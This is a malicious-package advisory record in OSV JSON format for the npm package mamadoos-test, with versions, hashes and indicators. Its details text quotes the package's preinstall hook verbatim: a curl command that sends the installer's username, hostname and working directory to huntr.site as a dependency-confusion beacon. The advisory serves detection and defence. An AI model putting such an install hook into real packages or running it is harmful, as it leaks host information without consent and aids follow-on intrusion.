{"id":"MAL-2026-4605","summary":"Malicious code in mamadoos-test (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)\npackage.json declares a preinstall lifecycle hook that runs `curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd)`, embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on `npm install` with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (`mamadoos-test: ^10.0.0`), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).\n","modified":"2026-05-26T06:02:39.730226609Z","published":"2026-05-20T14:02:39Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-05-20T14:13:53Z","source":"amazon-inspector","versions":["10.1.0"],"import_time":"2026-05-26T05:50:52.252692546Z","sha256":"2157659011628b870955375b0817f0efe48e349e33d56ce6df600fc2dd49b5b4","id":"IN-MAL-2026-003565"},{"modified_time":"2026-05-20T14:23:32Z","source":"amazon-inspector","sha256":"e902eada172d070291ec61612790e0c092d05c3b15e628f8f882c511421624bc","import_time":"2026-05-26T05:50:52.343617136Z","versions":["11.0.0"],"id":"IN-MAL-2026-003566"},{"modified_time":"2026-05-20T14:13:53Z","source":"amazon-inspector","sha256":"21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4","import_time":"2026-05-26T05:50:52.095803077Z","versions":["10.1.0"],"id":"IN-MAL-2026-003564"},{"modified_time":"2026-05-20T14:02:39Z","source":"amazon-inspector","versions":["10.0.0"],"import_time":"2026-05-26T05:50:51.650607747Z","sha256":"277d047f21aee2aec8b9d3cf07e8896540cb52a5422b8c8d23eebed8e53f2f75","id":"IN-MAL-2026-003560"},{"modified_time":"2026-05-20T14:24:04Z","source":"amazon-inspector","versions":["11.0.0"],"import_time":"2026-05-26T05:50:52.442455676Z","sha256":"6cc33157a1957f8c02515b475a6cf70c8340a8bd8c98dd8a748b8d9cb57bf595","id":"IN-MAL-2026-003567"},{"modified_time":"2026-05-20T14:02:39Z","source":"amazon-inspector","sha256":"b1f5386ccd6225cc257c44ad170e11b7ce8b580ba1d62877b71dbfdc41e0df49","import_time":"2026-05-26T05:50:51.551698461Z","versions":["10.0.0"],"id":"IN-MAL-2026-003559"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/mamadoos-test/v/11.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/mamadoos-test/v/10.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/mamadoos-test/v/10.0.0"}],"affected":[{"package":{"name":"mamadoos-test","ecosystem":"npm","purl":"pkg:npm/mamadoos-test"},"versions":["10.1.0","11.0.0","10.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mamadoos-test/MAL-2026-4605.json","indicators":{"domains":["huntr.site"],"package_integrity":[{"hashes":{"sha512_sri":"sha512-uVdyeFLh9zElcmZbtwhTJ+CwQWeDsquCt8wPS+nqiZqc3mjEvlAIqVvic5FcLxYD7wVfSRjgnsqRoKVJN68FCQ==","sha1":"7d5da3b38ce39f5549a8613c2a4981db095c9e4d"},"filename":"mamadoos-test-11.0.0.tgz"}],"evidence_files":[{"path":"package.json","tlsh":"0dd022320c20d1f3bdca06a20825d00fba938e0b33882909eacb1404b0082b3d5a120f","sha256":"df62a8a3ba04f6eefd777b9053d6cce224e45d674f7724ddd94d9dcfdc53c198"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}